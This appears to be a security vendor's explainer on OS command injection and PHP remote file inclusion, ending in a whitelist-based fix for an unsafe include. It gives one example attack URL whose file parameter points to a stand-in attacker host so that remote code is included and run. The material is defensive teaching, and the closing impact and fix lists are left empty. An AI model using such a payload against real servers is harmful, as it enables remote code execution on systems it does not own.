OS command injection is a vulnerability that lets an attacker execute operating system commands on a web server through a web application. The attacker supplies the commands through a web interface, and interfaces that do not properly sanitise their input are the ones usually exposed to this exploitation. The attacker gains the ability to execute OS commands in the server's shell, can load malicious programs, and can even access the passwords of end users. An attacker can execute any malicious bash command on the system: the web application runs the command, captures its output, and returns the result to the attacker. The commands can include everything from simple ping commands to map the internal network. This vulnerability can be fixed by emphasizing security during the initial design and development of web applications.

By injecting OS commands and measuring the time they take to execute, our scanner can detect whether the injection is time-based OS command injection or any other injection. If the result proves that the site is vulnerable to blind OS command injection using timing attacks, it will be due to improper input sanitisation.
In PHP
In the PHP example given below, if the path passed to an “include” statement is not properly sanitised, the code will look for scripts that accept the filename as input.
If the path is extracted from an HTTP request and no input validation is done (for example, by checking the input against a whitelist), this snippet of code will result in remote file inclusion.
https://example.beaglesecurity.com/vuln_page.php?file=http://attacker_site/malicous_page
In this case, the remote file included in the URL will be executed by the server.
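The following is an added example, not code from the original page: it shows the unvalidated “include” pattern described above as a comment, next to a whitelist-based replacement. The page keys (home, about, contact), the pages directory and the resolve_page function are hypothetical, and the code assumes PHP 8.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern described above (shown as a comment, not executed):
//   include $_GET['file'];   // request value goes straight into include

// Hypothetical whitelist: public page key => script name fixed by the developer.
// The request only ever selects a key; it never supplies a path or URL.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path of the script to include, or null when the
 * requested value is not an exact whitelist key.
 */
function resolve_page(mixed $requested, string $baseDir): ?string
{
    // Arrays (?file[]=x) and other non-string values are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist inside the base directory.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// A URL or traversal string in ?file= is not a whitelist key, so it yields a 404.
$target = resolve_page($_GET['file'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Keeping allow_url_include set to Off in php.ini (its default) additionally stops “include” from fetching remote URLs.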
The impact includes:
This vulnerability can be fixed by: